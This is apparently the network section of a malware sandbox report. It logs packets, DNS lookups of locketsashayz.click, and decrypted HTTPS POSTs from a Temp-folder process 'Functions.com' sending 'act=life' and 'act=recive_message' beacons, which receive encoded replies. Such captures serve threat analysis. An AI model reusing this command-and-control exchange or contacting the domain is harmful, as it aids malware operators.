                                    Dec 25, 2024 22:44:52.813163996 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.031028032 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.031217098 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.035938978 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.035958052 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.036197901 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.081906080 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.089975119 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.090013027 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.090042114 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.761960030 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.762058020 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.762111902 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.764034986 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.764053106 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.771308899 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.771373034 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:54.771450043 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.771760941 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:54.771775007 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:55.986602068 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:55.986824989 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:55.988092899 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:55.988122940 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:55.988372087 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:55.989998102 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:55.990036011 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:55.990082979 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.793488026 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.793544054 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.793565035 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.793603897 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.793603897 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.793673992 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.793716908 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.802500963 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.802583933 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.802611113 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.847537041 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.913137913 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.917078018 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.917141914 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.917156935 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.956928968 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.956958055 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.985354900 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.985413074 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.985423088 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.988801956 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.988842964 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.988851070 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.994532108 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.994573116 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.994580984 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.994615078 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.994653940 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.994736910 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.994756937 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:56.994770050 CET49739443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:56.994776964 CET44349739172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:57.054949999 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:57.054994106 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:57.055103064 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:57.055397987 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:57.055417061 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:58.267962933 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:58.268166065 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:58.269428968 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:58.269459963 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:58.269706011 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:58.270876884 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:58.270996094 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:58.271044970 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:58.271192074 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:58.271208048 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:59.182420969 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:59.182540894 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:59.182610035 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:59.351113081 CET49740443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:59.351161003 CET44349740172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:59.392561913 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:59.392627001 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:59.392698050 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:59.393254995 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:59.393270016 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:00.607435942 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:00.607498884 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:00.608772039 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:00.608782053 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:00.608999014 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:00.610189915 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:00.610323906 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:00.610338926 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:01.409858942 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:01.409960985 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:01.410065889 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:01.410238028 CET49741443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:01.410260916 CET44349741172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:01.477997065 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:01.478095055 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:01.478188992 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:01.478535891 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:01.478569984 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:02.691920042 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:02.692006111 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:02.693262100 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:02.693299055 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:02.693555117 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:02.694943905 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:02.695086956 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:02.695148945 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:02.695216894 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:02.695235014 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:03.624808073 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:03.624900103 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:03.624964952 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:03.625159025 CET49742443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:03.625180006 CET44349742172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:03.960032940 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:03.960097075 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:03.960195065 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:03.960534096 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:03.960547924 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.173917055 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.173993111 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.175215006 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.175230026 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.175443888 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.176553965 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.176682949 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.176706076 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.948879957 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.948973894 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.949063063 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.949151993 CET49744443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.949176073 CET44349744172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.961709976 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.961767912 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:05.961901903 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.962371111 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:05.962382078 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.174539089 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.174640894 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:07.176053047 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:07.176086903 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.176306963 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.177326918 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:07.177443981 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:07.177472115 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.923629045 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.923731089 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:07.923829079 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:07.923968077 CET49751443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:07.923990011 CET44349751172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:08.220910072 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:08.220998049 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:08.221087933 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:08.221379042 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:08.221411943 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.433712959 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.433794022 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.435008049 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.435038090 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.435286045 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.436316967 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.436853886 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.436899900 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.437041998 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.437088966 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.437228918 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.437271118 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.437427044 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.437474966 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.437674046 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.437726021 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.437946081 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.438004017 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.438026905 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.438040018 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.438091040 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.438107014 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.438261986 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.438301086 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.438339949 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.438441992 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.438492060 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.483335972 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.483612061 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.483655930 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.483706951 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.483731031 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:09.483786106 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:09.483810902 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:11.813188076 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:11.813292980 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:11.813352108 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:11.813559055 CET49757443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:11.813601971 CET44349757172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:11.816742897 CET49763443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:11.816777945 CET44349763172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:11.816852093 CET49763443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:11.817136049 CET49763443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:45:11.817152977 CET44349763172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:45:12.472872972 CET49763443192.168.2.4172.67.158.190

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 25, 2024 22:44:11.819041967 CET5341553192.168.2.41.1.1.1
                                    Dec 25, 2024 22:44:12.039561033 CET53534151.1.1.1192.168.2.4
                                    Dec 25, 2024 22:44:52.490230083 CET6238453192.168.2.41.1.1.1
                                    Dec 25, 2024 22:44:52.802828074 CET53623841.1.1.1192.168.2.4

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 25, 2024 22:44:11.819041967 CET192.168.2.41.1.1.10x3e24Standard query (0)AmbFabOJkVOtJKbeUCnvdoZI.AmbFabOJkVOtJKbeUCnvdoZIA (IP address)IN (0x0001)false
                                    Dec 25, 2024 22:44:52.490230083 CET192.168.2.41.1.1.10x96a2Standard query (0)locketsashayz.clickA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 25, 2024 22:44:12.039561033 CET1.1.1.1192.168.2.40x3e24Name error (3)AmbFabOJkVOtJKbeUCnvdoZI.AmbFabOJkVOtJKbeUCnvdoZInonenoneA (IP address)IN (0x0001)false
                                    Dec 25, 2024 22:44:52.802828074 CET1.1.1.1192.168.2.40x96a2No error (0)locketsashayz.click172.67.158.190A (IP address)IN (0x0001)false
                                    Dec 25, 2024 22:44:52.802828074 CET1.1.1.1192.168.2.40x96a2No error (0)locketsashayz.click104.21.57.27A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • locketsashayz.click

                                    HTTPS Proxied Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449738172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:44:54 UTC266OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: locketsashayz.click
                                    2024-12-25 21:44:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                    2024-12-25 21:44:54 UTC1131INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:44:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=g36f1s49c96t1qqut3a1528ltt; expires=Sun, 20 Apr 2025 15:31:33 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TRgusmtQ%2FaNsJtCiYxx%2FBIeYGb6Tdj2DpgVXRQ9arWBmhjm6e3oRk4gKUx%2FaZAQEzNYn6ANq5og1%2BX7wIarOA8bidRKRfjN1Id4j9Fa35PlZqEK%2BAZLP%2Fbphp2fhopOHLRjjC8cc"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c03db6e6943a7-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1703&rtt_var=666&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1608815&cwnd=177&unsent_bytes=0&cid=9aba6717e952c4aa&ts=743&x=0"
                                    2024-12-25 21:44:54 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                    2024-12-25 21:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.449739172.67.158.1904437844C:\Users\user\AppData\Local\Temp\8429\Functions.com
                                    TimestampBytes transferredDirectionData
                                    2024-12-25 21:44:55 UTC267OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 78
                                    Host: locketsashayz.click
                                    2024-12-25 21:44:55 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                    Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397
                                    2024-12-25 21:44:56 UTC1131INHTTP/1.1 200 OK
                                    Date: Wed, 25 Dec 2024 21:44:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=m1k9jmgvjvj2bvvd8kka4qitm0; expires=Sun, 20 Apr 2025 15:31:35 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bqmsg9M1z%2FcmQDBaYJEuiLjnQsep0RWYAAZkz4%2FT1mOcqiPgH5sDUzlmdxDQhZ2ylYUHAE%2BJlQ5QDnW7YFpICNNtv%2BuTfXHcR5jIG2q4tDZ2B8m%2Fcbuspfruoz%2FONekBCyIku5Vl"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8f7c03e7ae5e43f8-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1794&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=981&delivery_rate=1627647&cwnd=217&unsent_bytes=0&cid=731f6431c8926475&ts=813&x=0"
                                    2024-12-25 21:44:56 UTC238INData Raw: 34 36 62 0d 0a 54 31 6a 63 6f 73 77 37 49 65 4b 6f 32 72 42 54 34 6d 79 2f 72 47 2f 52 4a 79 68 6e 41 61 54 63 42 52 33 6a 64 41 62 55 41 67 6f 30 65 71 71 41 39 67 38 4e 77 4e 75 2f 6b 6d 6d 57 48 73 72 4a 51 2f 4e 47 54 45 55 37 77 72 31 70 62 6f 5a 59 4a 4b 4a 76 4b 48 55 2b 76 63 36 2f 58 67 33 41 7a 61 4b 53 61 62 6b 58 6e 63 6b 42 38 78 30 4b 41 6d 76 47 76 57 6c 2f 67 68 39 70 70 47 35 70 4a 7a 53 37 79 71 6c 59 52 59 50 45 74 39 55 32 68 77 33 56 77 67 61 38 54 30 56 46 4c 59 61 35 66 7a 2f 5a 56 6b 75 78 64 6d 73 43 4f 61 2f 4a 37 6b 59 4e 6d 59 71 2f 33 6e 48 59 54 74 37 4a 44 62 31 42 54 41 78 70 7a 4c 52 68 66 6f 63 65 64 72 31 6b 59 69 63 36 75 4d 75 6a 55 56 47 4f 7a 72 44 65 4d 49 30 4e 6e
                                    Data Ascii: 46bT1jcosw7IeKo2rBT4my/rG/RJyhnAaTcBR3jdAbUAgo0eqqA9g8NwNu/kmmWHsrJQ/NGTEU7wr1pboZYJKJvKHU+vc6/Xg3AzaKSabkXnckB8x0KAmvGvWl/gh9ppG5pJzS7yqlYRYPEt9U2hw3Vwga8T0VFLYa5fz/ZVkuxdmsCOa/J7kYNmYq/3nHYTt7JDb1BTAxpzLRhfocedr1kYic6uMujUVGOzrDeMI0Nn
                                    2024-12-25 21:44:56 UTC900INData Raw: 59 42 4e 74 46 30 4b 58 53 4f 56 6a 47 52 75 6b 41 4e 70 70 6d 59 6f 4d 6e 53 6e 67 4b 6c 56 41 39 69 4b 73 4e 34 2f 68 51 33 53 79 51 79 7a 56 30 55 46 59 4d 36 32 59 33 57 4f 47 57 75 34 61 6d 38 6c 4d 37 6e 50 71 56 46 46 6a 38 6e 34 6e 48 47 48 46 70 32 57 54 5a 4e 56 53 51 5a 33 79 36 38 6e 59 4d 38 50 4a 4c 46 73 4b 48 56 36 75 4d 36 76 56 45 4f 53 77 72 50 5a 4e 4a 49 46 31 4d 4d 41 73 30 68 41 43 6d 44 47 75 57 31 31 6a 68 78 67 75 32 31 75 4c 54 72 2b 6a 75 35 65 57 38 43 53 2b 50 45 30 6b 41 6e 52 32 45 2b 4a 42 56 56 4c 65 6f 61 35 61 7a 2f 5a 56 6d 79 7a 59 32 73 6d 4e 62 33 49 70 55 74 44 6b 73 79 31 31 79 4f 47 43 39 50 45 44 71 46 50 52 41 4e 67 7a 37 56 75 65 6f 59 53 4a 50 67 67 62 7a 56 36 35 6f 43 50 56 45 69 4d 77 4b 2f 53 63 5a 39 41
                                    Data Ascii: YBNtF0KXSOVjGRukANppmYoMnSngKlVA9iKsN4/hQ3SyQyzV0UFYM62Y3WOGWu4am8lM7nPqVFFj8n4nHGHFp2WTZNVSQZ3y68nYM8PJLFsKHV6uM6vVEOSwrPZNJIF1MMAs0hACmDGuW11jhxgu21uLTr+ju5eW8CS+PE0kAnR2E+JBVVLeoa5az/ZVmyzY2smNb3IpUtDksy11yOGC9PEDqFPRANgz7VueoYSJPggbzV65oCPVEiMwK/ScZ9A
                                    2024-12-25 21:44:56 UTC1369INData Raw: 34 61 65 31 0d 0a 44 76 55 4a 63 52 58 79 49 70 79 64 34 6a 56 59 38 39 6d 39 6e 49 6a 4b 2b 77 61 70 55 52 34 48 48 74 4e 73 79 6a 41 4c 56 77 77 47 33 53 6b 49 4e 59 4d 36 73 61 58 47 48 45 47 53 7a 49 43 5a 74 50 61 61 41 39 68 6c 6e 6a 74 32 73 32 58 4f 31 44 64 50 41 43 71 55 46 56 55 74 36 68 72 6c 72 50 39 6c 57 61 72 74 72 5a 43 6f 7a 76 38 4f 75 55 30 32 50 77 4c 44 61 4d 59 30 50 31 73 59 4c 76 6b 35 46 43 6d 54 4f 76 57 74 36 6a 42 55 6b 2b 43 42 76 4e 58 72 6d 67 49 74 58 51 4a 48 62 2b 75 63 79 6a 67 44 61 32 45 32 73 43 31 4e 46 5a 4d 72 2b 50 7a 2b 4c 45 57 4f 79 62 57 49 75 50 72 72 4e 6f 56 42 4b 69 64 69 79 33 6a 2b 53 41 39 66 4c 41 37 39 41 52 51 56 69 78 37 42 74 64 4d 46 59 4a 4c 46 34 4b 48 56 36 6b 63 32 2b 53 30 6d 4c 32 2f 72 6e
                                    Data Ascii: 4ae1DvUJcRXyIpyd4jVY89m9nIjK+wapUR4HHtNsyjALVwwG3SkINYM6saXGHEGSzICZtPaaA9hlnjt2s2XO1DdPACqUFVUt6hrlrP9lWartrZCozv8OuU02PwLDaMY0P1sYLvk5FCmTOvWt6jBUk+CBvNXrmgItXQJHb+ucyjgDa2E2sC1NFZMr+Pz+LEWOybWIuPrrNoVBKidiy3j+SA9fLA79ARQVix7BtdMFYJLF4KHV6kc2+S0mL2/rn
